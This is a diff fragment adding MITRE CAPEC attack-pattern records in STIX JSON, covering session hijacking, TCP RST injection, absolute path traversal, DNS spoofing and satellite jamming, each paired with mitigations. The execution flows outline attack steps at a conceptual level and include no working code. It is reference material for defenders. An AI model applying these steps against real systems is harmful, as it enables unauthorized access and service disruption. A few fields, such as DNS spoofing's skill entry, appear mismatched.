"T1550.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/001" + }, + { + "description": "Remote Service Session Hijacking", + "external_id": "T1563", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1563" + }, + { + "description": "Session hijacking attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Session_hijacking_attack" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-603", + 
"source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/09-Testing_for_Session_Hijacking.html" + } + ], + "id": "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Session Hijacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228" + ], + "x_capec_consequences": { + "Availability": [ + "Gain Privileges (A successful attack can enable an adversary to gain unauthorized access to an application.)" + ], + "Confidentiality": [ + "Gain Privileges (A successful attack can enable an adversary to gain unauthorized access to an application.)" + ], + "Integrity": [ + "Gain Privileges (A successful attack can enable an adversary to gain unauthorized access to an application.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Discover Existing Session Token: Through varrying means, an adversary will discover and store an existing session token for some other authenticated user session.

Experiment

  1. Insert Found Session Token: The attacker attempts to insert a found session token into communication with the targeted application to confirm viability for exploitation.

Exploit

  1. Session Token Exploitation: The attacker leverages the captured session token to interact with the targeted application in a malicious fashion, impersonating the victim.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--6a99b39b-b14a-4617-8aeb-bce85979f520", + "attack-pattern--f14acee3-770c-4154-a9b2-9eda908c6a9f", + "attack-pattern--a15ef978-f79c-4a64-8c63-8ab413d42b0f", + "attack-pattern--c1e3e934-5b43-4af9-b92b-9a4837a90c14" + ], + "x_capec_prerequisites": [ + "An application that leverages sessions to perform authentication." + ], + "x_capec_resources_required": [ + "The adversary must have the ability to communicate with the application over the network." + ], + "x_capec_skills_required": { + "Low": "Exploiting a poorly protected identity token is a well understood attack with many helpful resources available." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly encrypt and sign identity tokens in transit, and use industry standard session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf. Utilize a session timeout for all sessions. If the user does not explicitly logout, terminate their session after this period of inactivity. 
If the user logs back in then a new session key should be generated.", + "id": "course-of-action--c731b443-09c9-4d03-bdc2-a9053ce6ea90", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-593-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-04-15T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b99d4053-f452-4a85-b020-ad0868cb52cf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c731b443-09c9-4d03-bdc2-a9053ce6ea90", + "target_ref": "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-03T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary injects traffic into the target's network connection. The adversary is therefore able to degrade or disrupt the connection, and potentially modify the content. This is not a flooding attack, as the adversary is not focusing on exhausting resources. 
Instead, the adversary is crafting a specific input to affect the system in a particular way.", + "external_references": [ + { + "external_id": "CAPEC-594", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/594.html" + }, + { + "external_id": "CWE-940", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/940.html" + } + ], + "id": "attack-pattern--6a7fbe0a-080e-4f8b-854d-1d959dbeab8e", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Traffic Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (The injection of specific content into a connection can trigger a disruption in that communications channel, thereby denying availability of the service.)" + ], + "Integrity": [ + "Other (An adversary's injection of additional content into a communication channel negatively impacts the integrity of that channel.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--e6f6d082-2186-4008-b52f-91f67abdba90" + ], + "x_capec_prerequisites": [ + "The target application must leverage an open communications channel.", + "The channel on which the target communicates must be vulnerable to interception (e.g., adversary in the middle attack - CAPEC-94)." + ], + "x_capec_resources_required": [ + "A tool, such as a MITM Proxy, that is capable of generating and injecting custom inputs to be used in the attack." + ], + "x_capec_status": "Stable", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, an adversary injects a connection reset packet to one or both ends of a target's connection. 
The attacker is therefore able to have the target and/or the destination server sever the connection without having to directly filter the traffic between them.", + "external_references": [ + { + "external_id": "CAPEC-595", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/595.html" + }, + { + "external_id": "CWE-940", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/940.html" + } + ], + "id": "attack-pattern--e6f6d082-2186-4008-b52f-91f67abdba90", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Connection Reset", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6a7fbe0a-080e-4f8b-854d-1d959dbeab8e" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--dfd75d4a-689b-4cbd-9013-4ed32713dc64" + ], + "x_capec_prerequisites": [ + "This attack requires the ability to monitor the target's network connection." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-03T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary injects one or more TCP RST packets to a target after the target has made a HTTP GET request. 
The goal of this attack is to have the target and/or destination web server terminate the TCP connection.", + "external_references": [ + { + "external_id": "CAPEC-596", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/596.html" + }, + { + "external_id": "CWE-940", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/940.html" + }, + { + "description": "John-Paul Verkamp, Minaxi Gupta, Inferring Mechanics of Web Censorship Around the World, 2012, USENIX", + "external_id": "REF-477", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--dfd75d4a-689b-4cbd-9013-4ed32713dc64", + "modified": "2019-04-04T00:00:00.000Z", + "name": "TCP RST Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e6f6d082-2186-4008-b52f-91f67abdba90" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "An On/In Path Device" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary with access to file system resources, either directly or via application logic, will use various file absolute paths and navigation mechanisms such as \"..\" to extend their range of access to inappropriate areas of the file system. 
The goal of the adversary is to access directories and files that are intended to be restricted from their access.", + "external_references": [ + { + "external_id": "CAPEC-597", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/597.html" + }, + { + "external_id": "CWE-36", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/36.html" + } + ], + "id": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Absolute Path Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Unreliable Execution (The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Read Data (The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. 
For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Modify Data (The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to perform a valid path traversal, the adversary needs to know what the underlying OS is so that the proper file seperator is used.

  2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The adversary uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages
  3. Survey application: Using manual or automated means, an adversary will survey the target application looking for all areas where user input is taken to specify a file name or path.

  4. Techniques
    Use a spidering tool to follow and record all links on a web page. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of a web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore a website and analyze how it is constructed. Many browser's plug-in are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Attempt variations on input parameters: Using manual or automated means, an adversary attempts varying absolute file paths on all found user input locations and observes the responses.

  2. Techniques
    Access common files in root directories such as \"/bin\", \"/boot\", \"/lib\", or \"/home\"
    Access a specific drive letter or windows volume letter by specifying \"C:dirname\" for example
    Access a known Windows UNC share by specifying \"\\\\UNC\\share\\name\" for example

Exploit

  1. Access, modify, or execute arbitrary files.: An adversary injects absolute path traversal syntax into identified vulnerable inputs to cause inappropriate reading, writing or execution of files. An adversary could be able to read directories or files which they are normally not allowed to read. The adversary could also access data outside the web document root, or include scripts, source code and other kinds of files from external websites. Once the adversary accesses arbitrary files, they could also modify files. In particular situations, the adversary could also execute arbitrary code or system commands.

  2. Techniques
    Manipulate file and its path by injecting absolute path sequences (e.g. \"/home/file.txt\").
    Download files, modify files, or try to execute shell commands (with binary files).
", + "x_capec_prerequisites": [ + "The target must leverage and access an underlying file system." + ], + "x_capec_resources_required": [ + "The attacker must have access to an application interface or a direct shell that allows them to inject directory strings and monitor the results." + ], + "x_capec_skills_required": { + "Low": "Simple command line attacks.", + "Medium": "Programming attacks." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cd5a0b68-7c46-4210-afeb-a383890ba931", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49faa4e3-77fa-4b56-8186-be9d4302e09a", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3a5fb6c7-5605-48a4-b2ca-bcfff3e93226", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01a4f9a4-8d52-4cd3-a2e0-11eee4192954", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + 
"target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--083f46f3-7384-4987-a5d7-3b3b3c58e717", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6a928417-72f9-4429-951c-8dcaca5edc6d", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ea68faae-9ff5-4a52-a520-135a612e4458", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--da440d05-dc0e-4bfa-8490-7178ae419336", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--70fb8b30-3f7c-41ef-a691-34c163c6e04b", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa408ca1-01a2-404d-a24a-90d14b0fcdbe", + "modified": 
"2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c433a52-7784-4abd-b404-41fc8a423886", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce2dd07c-e915-4e7b-90b5-8af1442e1aae", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3379e8f-995d-4df7-be15-7861c104b55c", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff83398b-e67f-4c7c-be17-3abbb20aa2d9", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8d22787d-6e79-4bd5-8fb5-a6b95e74fc40", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f972cf8f-5c89-4e6c-87ad-8eb40c32883b", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + 
"x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--571be573-775a-4c2e-b74d-01d1a1a56a8a", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification using an allowlist approach.", + "id": "course-of-action--b994128b-dfc1-41e0-97a5-e9ec2c1056ee", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-597-11", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-06T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d4be0c7a-12b3-47bb-9012-e6800e680e58", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b994128b-dfc1-41e0-97a5-e9ec2c1056ee", + "target_ref": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary sends a malicious (\"NXDOMAIN\" (\"No such domain\") code, or DNS A record) response to a target's 
route request before a legitimate resolver can. This technique requires an On-path or In-path device that can monitor and respond to the target's DNS requests. This attack differs from BGP Tampering in that it directly responds to requests made by the target instead of polluting the routing the target's infrastructure uses.", + "external_references": [ + { + "external_id": "CAPEC-598", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/598.html" + }, + { + "description": "John-Paul Verkamp, Minaxi Gupta, Inferring Mechanics of Web Censorship Around the World, 2012, USENIX", + "external_id": "REF-477", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Anonymous, Towards a Comprehensive Picture of the Great Firewall's DNS Censorship, 2014, USENIX", + "external_id": "REF-479", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "modified": "2023-01-24T00:00:00.000Z", + "name": "DNS Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Below-Recursive DNS Poisoning: When an On/In-path device between a recursive DNS server and a user sends a malicious (\"NXDOMAIN\" (\"No such domain\") code, or DNS A record ) response before a legitimate resolver can.", + "Above-Recursive DNS Poisoning: When an On/In-path device between an authority server (e.g., government-managed) and a recursive DNS server sends a malicious (\"NXDOMAIN\" (\"No such domain\")code, or a DNS record) response before a legitimate resolver can." 
+ ], + "x_capec_prerequisites": [ + "On/In Path Device" + ], + "x_capec_skills_required": { + "Low": "To distribute email" + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Avoid dependence on DNS", + "id": "course-of-action--818958f8-e5a6-4522-9a89-e48271100548", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ae2e6105-d7fc-4e98-9dea-4493606440c6", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--818958f8-e5a6-4522-9a89-e48271100548", + "target_ref": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Include \"hosts file\"/IP address in the application", + "id": "course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5fbf3499-e8c7-452e-87c7-9bd2e4733100", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + 
"relationship_type": "mitigates", + "source_ref": "course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad", + "target_ref": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Utilize a .onion domain with Tor support", + "id": "course-of-action--ec56aac0-0a2d-4aad-b6c5-8afa9f5806f2", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3f5c44bc-4c83-4819-add3-4fc2f11b2fde", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ec56aac0-0a2d-4aad-b6c5-8afa9f5806f2", + "target_ref": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: DNSSEC", + "id": "course-of-action--9c484afc-3584-4587-a260-116ead182709", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6c28461d-523b-453f-99b1-a60849c2db18", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c484afc-3584-4587-a260-116ead182709", + "target_ref": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: DNS-hold-open", + "id": "course-of-action--38d9ad7c-d797-454b-a4b5-f9f3b392be10", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--13141463-336a-4b22-955f-de061f868998", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--38d9ad7c-d797-454b-a4b5-f9f3b392be10", + "target_ref": "attack-pattern--ed79989c-6824-4b9d-912d-8d1fffe93715", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2017-01-12T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack pattern, the adversary transmits disruptive signals in the direction of the target's consumer-level satellite dish (as opposed to the satellite itself). The transmission disruption occurs in a more targeted range. Portable terrestrial jammers have a range of 3-5 kilometers in urban areas and 20 kilometers in rural areas. 
This technique requires a terrestrial jammer that is more powerful than the frequencies sent from the satellite.", + "external_references": [ + { + "external_id": "CAPEC-599", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/599.html" + }, + { + "description": "Small Media, Satellite Jamming in Iran: A War over Airwaves, 2012--11", + "external_id": "REF-462", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--521fbe1c-28d6-4ca0-bc8b-6e2dbc91332e", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Terrestrial Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--8711eca6-b3ad-40b7-b7ac-08be37885119" + ], + "x_capec_consequences": { + "Availability": [ + "Other (A successful attack will deny, degrade, or disrupt availability of satellite communications for the target by overwhelming its resources to accurately receive authorized transmissions.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "An attempt to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. These jamming signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary." 
